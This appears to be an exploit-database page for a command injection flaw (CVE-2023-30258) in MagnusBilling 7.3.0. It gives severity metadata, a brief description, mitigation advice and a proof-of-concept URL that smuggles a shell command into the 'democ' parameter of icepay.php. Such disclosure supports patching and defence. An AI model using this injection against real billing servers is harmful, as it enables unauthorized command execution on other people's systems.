header-logo
Suggest Exploit
vendor:
MagnusBilling
by:
CodeSecLab
6.1
CVSS
HIGH
Command Injection
78
CWE
Product Name: MagnusBilling
Affected Version From: 7.3.2000
Affected Version To: 7.3.2000
Patch Exists: NO
Related CWE: CVE-2023-30258
CPE: magnussolution:magnusbilling:7.3.0
Metasploit:
Other Scripts:
Platforms Tested: Centos
2024

MagnusSolution magnusbilling 7.3.0 – Command Injection

The MagnusSolution magnusbilling 7.3.0 software is vulnerable to command injection. An attacker can exploit this vulnerability by injecting malicious commands through a specific URL, potentially leading to unauthorized command execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs, validate and filter the input data to prevent the execution of arbitrary commands.
Source

Exploit-DB raw data:

# Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/magnussolution/magnusbilling7
# Software Link: https://github.com/magnussolution/magnusbilling7
# Version: 7.3.0 
# Tested on: Centos
# CVE : CVE-2023-30258


# PoC URL for Command Injection

http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt

Result: This PoC attempts to inject the id command.

[Replace Your Domain Name]

Navigation

Suggest Exploit

Services By CQR